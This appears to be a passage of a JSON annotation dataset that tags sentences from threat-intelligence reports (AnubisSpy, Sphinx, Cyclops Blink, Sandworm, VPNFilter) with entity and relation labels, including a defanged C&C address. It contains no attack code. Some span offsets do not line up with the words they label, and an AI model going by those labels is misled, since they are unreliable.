[ { "id": 51211, "label": "attack-pattern", "start_offset": 155, "end_offset": 171 }, { "id": 51209, "label": "identity", "start_offset": 68, "end_offset": 84 }, { "id": 51210, "label": "identity", "start_offset": 90, "end_offset": 110 } ]
[ { "id": 1071, "from_id": 51209, "to_id": 51210, "type": "related-to" } ]
[]
5,230
We named these malicious apps AnubisSpy (ANDROIDOS_ANUBISSPY) as all the malware’s payload is a package called watchdog.
[ { "id": 51263, "label": "malware", "start_offset": 111, "end_offset": 119 }, { "id": 51262, "label": "malware", "start_offset": 41, "end_offset": 60 }, { "id": 16073, "label": "malware", "start_offset": 30, "end_offset": 39 } ]
[ { "id": 1072, "from_id": 51262, "to_id": 16073, "type": "duplicate-of" } ]
[]
5,245
Sphinx reportedly uses the watering hole technique via social media sites to deliver its payloads — mainly a customized version of njRAT.
[ { "id": 51279, "label": "campaign", "start_offset": 1, "end_offset": 7 }, { "id": 51280, "label": "malware", "start_offset": 132, "end_offset": 137 } ]
[ { "id": 1073, "from_id": 51279, "to_id": 51280, "type": "uses" } ]
[]
5,249
We correlated the AnubisSpy variants to Sphinx’s desktop/PC-targeting malware through the following: Shared C&C server, 86[.]105[.]18[.]107 Shared technique of decrypting JSON files, and similarity between the file structures of AnubisSpy and Sphinx’s malware Similar targets (highly concentrated in Middle Eastern countries) Figure 2: Comparison of file structure in Sphinx’s desktop/PC-targeting malware (left) and AnubisSpy (right)
[ { "id": 51288, "label": "malware", "start_offset": 18, "end_offset": 27 }, { "id": 51287, "label": "location", "start_offset": 301, "end_offset": 315 }, { "id": 16131, "label": "IPV4", "start_offset": 121, "end_offset": 140 }, { "id": 16134, "label": "malware", "start_offset": 230, "end_offset": 239 }, { "id": 16130, "label": "campaign", "start_offset": 40, "end_offset": 46 }, { "id": 16142, "label": "malware", "start_offset": 422, "end_offset": 431 }, { "id": 16140, "label": "campaign", "start_offset": 373, "end_offset": 379 }, { "id": 16136, "label": "campaign", "start_offset": 244, "end_offset": 250 } ]
[ { "id": 1074, "from_id": 16130, "to_id": 51288, "type": "uses" }, { "id": 1075, "from_id": 16131, "to_id": 16130, "type": "indicates" }, { "id": 1076, "from_id": 16136, "to_id": 51287, "type": "targets" }, { "id": 1077, "from_id": 16134, "to_id": 51287, "type": "targets" } ]
[]
5,279
Cyclops Blink, an advanced modular botnet that is reportedly linked to the Sandworm or Voodoo Bear advanced persistent threat (APT) group, has recently been used to target WatchGuard Firebox devices according to an analysis performed by the UK’s National Cyber Security Centre (NCSC).
[ { "id": 51322, "label": "malware", "start_offset": 0, "end_offset": 13 }, { "id": 51324, "label": "threat-actor", "start_offset": 87, "end_offset": 98 }, { "id": 51323, "label": "threat-actor", "start_offset": 75, "end_offset": 83 }, { "id": 51325, "label": "identity", "start_offset": 241, "end_offset": 283 } ]
[ { "id": 1078, "from_id": 51324, "to_id": 51323, "type": "duplicate-of" }, { "id": 1079, "from_id": 51322, "to_id": 51323, "type": "related-to" } ]
[]
5,284
Our data also shows that although Cyclops Blink is a state-sponsored botnet, its C&C servers and bots affect WatchGuard Firebox and Asus devices that do not belong to critical organizations, or those that have an evident value on economic, political, or military espionage.
[ { "id": 51332, "label": "malware", "start_offset": 34, "end_offset": 47 }, { "id": 51334, "label": "SOFTWARE", "start_offset": 109, "end_offset": 127 }, { "id": 51335, "label": "SOFTWARE", "start_offset": 132, "end_offset": 144 } ]
[ { "id": 1080, "from_id": 51332, "to_id": 51334, "type": "targets" }, { "id": 1081, "from_id": 51332, "to_id": 51335, "type": "targets" } ]
[]
5,287
The Sandworm APT group has been attributed as creating both Cyclops Blink and the VPNFilter internet of things (IoT) botnet.
[ { "id": 51338, "label": "threat-actor", "start_offset": 6, "end_offset": 14 }, { "id": 51339, "label": "malware", "start_offset": 62, "end_offset": 75 }, { "id": 51340, "label": "malware", "start_offset": 84, "end_offset": 93 } ]
[ { "id": 1083, "from_id": 51340, "to_id": 51338, "type": "attributed-to" }, { "id": 1082, "from_id": 51339, "to_id": 51338, "type": "attributed-to" } ]
[]
5,411
The vendors that were targeted by VPNFilter were Asus, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL, and ZDE.
[ { "id": 51412, "label": "identity", "start_offset": 99, "end_offset": 103 }, { "id": 51415, "label": "identity", "start_offset": 135, "end_offset": 138 }, { "id": 51409, "label": "identity", "start_offset": 71, "end_offset": 78 }, { "id": 51410, "label": "identity", "start_offset": 80, "end_offset": 88 }, { "id": 51405, "label": "malware", "start_offset": 34, "end_offset": 43 }, { "id": 51406, "label": "identity", "start_offset": 49, "end_offset": 53 }, { "id": 51407, "label": "identity", "start_offset": 55, "end_offset": 61 }, { "id": 51408, "label": "identity", "start_offset": 63, "end_offset": 69 }, { "id": 51411, "label": "identity", "start_offset": 90, "end_offset": 97 }, { "id": 51413, "label": "identity", "start_offset": 105, "end_offset": 112 }, { "id": 51414, "label": "identity", "start_offset": 114, "end_offset": 122 } ]
[ { "id": 1084, "from_id": 51405, "to_id": 51406, "type": "targets" }, { "id": 1085, "from_id": 51405, "to_id": 51407, "type": "targets" }, { "id": 1086, "from_id": 51405, "to_id": 51408, "type": "targets" }, { "id": 1087, "from_id": 51405, "to_id": 51409, "type": "targets" }, { "id": 1089, "from_id": 51405, "to_id": 51411, "type": "targets" }, { "id": 1090, "from_id": 51405, "to_id": 51412, "type": "targets" }, { "id": 1091, "from_id": 51405, "to_id": 51413, "type": "targets" }, { "id": 1088, "from_id": 51405, "to_id": 51410, "type": "targets" }, { "id": 1092, "from_id": 51405, "to_id": 51414, "type": "targets" }, { "id": 1093, "from_id": 51405, "to_id": 51415, "type": "targets" } ]
[]